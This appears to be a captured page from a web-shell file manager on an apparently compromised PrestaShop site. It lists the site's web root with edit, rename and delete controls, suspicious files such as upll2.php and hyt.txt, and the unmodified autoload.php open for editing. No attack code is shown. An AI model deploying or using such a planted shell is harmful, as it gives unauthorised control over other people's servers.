File Manager Lite
Dir:
/home/u540325668/domains/dumbafarm.in/public_html
Upload
[..]
.htaccess (1.48 KB)
Edit
Rename
Del
.php-cs-fixer.dist.php (1.5 KB)
Edit
Rename
Del
LICENSES (179.55 KB)
Edit
Rename
Del
Makefile (863 B)
Edit
Rename
Del
app/
Rename
Del
autoload.php (1.27 KB)
Edit
Rename
Del
bin/
Rename
Del
cache/
Rename
Del
classes/
Rename
Del
composer.lock (493.26 KB)
Edit
Rename
Del
config/
Rename
Del
controllers/
Rename
Del
default.php (15.99 KB)
Edit
Rename
Del
docs/
Rename
Del
download/
Rename
Del
error500.html (2.45 KB)
Edit
Rename
Del
hyt.txt (1 B)
Edit
Rename
Del
img/
Rename
Del
index.php (5.69 KB)
Edit
Rename
Del
init.php (1.23 KB)
Edit
Rename
Del
js/
Rename
Del
localization/
Rename
Del
mails/
Rename
Del
modules/
Rename
Del
override/
Rename
Del
pdf/
Rename
Del
phpstan.neon.dist (2.83 KB)
Edit
Rename
Del
robots.txt (2.35 KB)
Edit
Rename
Del
s6nphnwgjj58lmhv/
Rename
Del
src/
Rename
Del
templates/
Rename
Del
themes/
Rename
Del
tmp/
Rename
Del
tools/
Rename
Del
translations/
Rename
Del
upll2.php (5.9 KB)
Edit
Rename
Del
upload/
Rename
Del
var/
Rename
Del
vendor/
Rename
Del
webservice/
Rename
Del
Edit: autoload.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * Allow call of Legacy classes from classes in /src and /tests * @see composer.json "files" property for custom autoloading */ require_once __DIR__.'/config/defines.inc.php'; require_once __DIR__.'/config/autoload.php';
Simpan